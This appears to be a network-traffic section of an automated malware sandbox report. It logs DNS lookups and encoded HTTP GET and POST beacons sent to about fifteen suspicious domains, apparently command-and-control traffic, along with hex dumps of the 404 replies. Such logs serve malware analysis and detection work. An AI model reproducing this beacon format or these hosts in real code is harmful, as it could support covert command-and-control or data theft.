                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /wq47/?ifzt=+qWmsYvD7OMlDEAEm/jaBDQSW8n+pKrv9iKIE2pdq1tK+kqvSnJEJbP2DMl6xw9oMdRXFlgn6DbTeTaaAs/qgaat4XAxW5JpuJNECjkmcyUCSAd0ff+SBDY=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.airrelax.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /572a/?ifzt=hz/gBsBCliEB3liRCjDcUFpXpjm75vqUHY7uUC9CoicjvHiRwDII6Rr7fwqPQOBPL5PXCDqoRSfvUw6rLDaKlN9Kt5+gU7jSjDaWWRyTQ8pSIxkDCsHDSL4=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.amayavp.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /ykn4/?qX=qP0hoZO0bjg4&ifzt=yDyVABeQ4Ct1InZ0OhfmdnBFKWQ7rCX+/8YxCwFx8D5ixU3VRgnj+l5ygnfgEeC3H+CzN484nEASY7Na52DMVUZTGbosqxUoBmbbT2616qreZhvQ7f+FXOQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bpgroup.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /jr18/?ifzt=3C4Tc4Z0RY2s+tVmXeTOODIbYY0cZjMPNpxOrzRAWYWXOarDQI6T49to0R5yr2OUxBUw9rD3bXyFurU9wVp+2dZYmhq26qK0uIAUBFaEfelf6gXLCXJ0iXw=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.127358.winConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /i3tv/?ifzt=ZfFmvi9Oe0q0E+s3tI8jowmrcKXFuAvLDG9tnsjazd2FMEfMyY6nK/4Bws6dZtaeRrlRwaDsvJ2Xfgg/epwI8XFwDGZNwHr0PbkZKGW1EbGZLzRKGsQFP6g=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.caj-bioteaque.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /nja3/?ifzt=xX7QHijLKmKAWZAs9KUJ90Gt08KwtA5eAlD9v6t/QyACTljzLqSragPJ2hUI6qEgwVB84l05/Y7pq3HewBlXgm1FdHpiB2a4qq1LC2jezQbSehWYjzmvyps=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.ssrpidemt-soar.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /sba9/?ifzt=hsKab5Z8okOTl8y9Vxbai4viX8bRHhfs9Ucn1wMjIFh0nzefPIjUKnrAgLCbEwixQNq8fslvmu/EEFVEU8GR0KRfEzdZZ5UTmPnT/iR9Rp0TOLJvLqtuatI=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.izmirescortg.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /xd9h/?ifzt=XJyTEs9GXoAybgJL3Lz0/JwH+eiTm1uUb57LZhSSXQP8iaO5Q6m7cM20hY6MGSJfub8ibR0rowNO83l3EomIXmC1+i3fga28+sLpZTTW/AC/fI2RjxZA+PI=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.030002613.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /zoqm/?qX=qP0hoZO0bjg4&ifzt=Qq0FFa8OkDRPhmjT0VM8NDOXfTRiFF6zBHj2iH9IdxJy16x8x8AWanWvy54Dx3T7LlN6VBvxFf1wAvhvFTk518nT82cv2sbx2pE2mKVvPmrAc0IY36SOsAA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.327531.buzzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /aezw/?ifzt=XNcWUHXsHCrFsIBQlHGgjiME8CQZSYUU21qPNzqhKy2oFU8Odgs/t8kovejF8iENVZDP/oOK84yuTx8YyXOBoi/XK/eRsY6lCiyQls/Pp30YwPjl0cgXKAM=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.urbanfashion.websiteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzB+Eo/kiz1zVNsrH4IZXq93JBsPKcKHGWPOW5+N9njVZg9AZ40ltQReYzymzYn/PGSkLTDv/+fBeI5c=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.canadavinreport.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /9k5s/?ifzt=LL9hxxOEAXNrd1/9gf6rhKwJTveb5Fl2+AbaSF/ioM6ycsHwCgOlWdWUKzBQGlsNiYd2kWB7LHmLrDvgpCIhDnf37DhA8cnF96i4zyTZqkB+X7XYpxBXm1Q=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.sankan-fukushi.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /lnel/?ifzt=Ribo6cOqqFxVl074lXpGE14xRzI3KKS1rVAQT2LhUo1xH+0e39DTDCE0P6QoW4LNcCjE4+6almbk+DseMcJWDalTnHVPsL+WixWnB7fmocU+RCDZF77iizc=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.carsten.studioConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /omhm/?ifzt=xaTrXXt9Kjd4VWfnLz4MLqEmpY3f+jxhDbzO0ePZZ/F2G9w3aeU7HujdvobedEDJNQrJvHKMILqdCxDRZi1zA3XNT5QIvXDZ0i+KO+cUgqjZuYPkfG7cBF4=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.cssa.auctionConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficDNS traffic detected: DNS query: www.airrelax.shop
                      Source: global trafficDNS traffic detected: DNS query: www.amayavp.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                      Source: global trafficDNS traffic detected: DNS query: www.127358.win
                      Source: global trafficDNS traffic detected: DNS query: www.caj-bioteaque.online
                      Source: global trafficDNS traffic detected: DNS query: www.ssrpidemt-soar.sbs
                      Source: global trafficDNS traffic detected: DNS query: www.izmirescortg.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.030002613.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.327531.buzz
                      Source: global trafficDNS traffic detected: DNS query: www.urbanfashion.website
                      Source: global trafficDNS traffic detected: DNS query: www.canadavinreport.site
                      Source: global trafficDNS traffic detected: DNS query: www.sankan-fukushi.info
                      Source: global trafficDNS traffic detected: DNS query: www.carsten.studio
                      Source: global trafficDNS traffic detected: DNS query: www.cssa.auction
                      Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                      Source: unknownHTTP traffic detected: POST /572a/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.amayavp.xyzContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 201Origin: http://www.amayavp.xyzReferer: http://www.amayavp.xyz/572a/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36Data Raw: 69 66 7a 74 3d 73 78 58 41 43 63 68 72 38 46 30 69 35 31 4c 69 4e 32 4c 4c 41 47 63 50 6c 54 53 56 72 76 75 6b 41 71 37 6d 4c 78 59 6e 6a 45 55 65 34 48 32 61 32 78 39 57 7a 54 6e 31 59 68 2b 33 65 37 64 38 46 72 7a 53 4b 54 61 4b 58 33 48 53 64 54 65 6a 4b 44 69 61 6c 4e 77 5a 6c 73 47 72 62 36 2f 35 72 47 32 48 59 41 50 30 52 74 74 4c 48 78 30 6c 65 63 50 6d 52 64 62 55 4d 6c 77 4c 67 76 2f 42 56 66 49 48 37 5a 4b 4d 42 48 6b 4d 6f 75 6d 35 43 51 77 49 49 4f 38 4a 57 56 58 74 41 78 48 50 52 67 38 45 68 42 45 47 4f 57 58 6f 34 51 75 2b 56 36 75 62 50 32 65 37 64 36 43 64 67 31 52 52 41 77 3d 3d Data Ascii: ifzt=sxXACchr8F0i51LiN2LLAGcPlTSVrvukAq7mLxYnjEUe4H2a2x9WzTn1Yh+3e7d8FrzSKTaKX3HSdTejKDialNwZlsGrb6/5rG2HYAP0RttLHx0lecPmRdbUMlwLgv/BVfIH7ZKMBHkMoum5CQwIIO8JWVXtAxHPRg8EhBEGOWXo4Qu+V6ubP2e7d6Cdg1RRAw==
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 25 Nov 2024 08:43:04 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 25 Nov 2024 08:43:06 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 25 Nov 2024 08:43:12 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 08:43:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 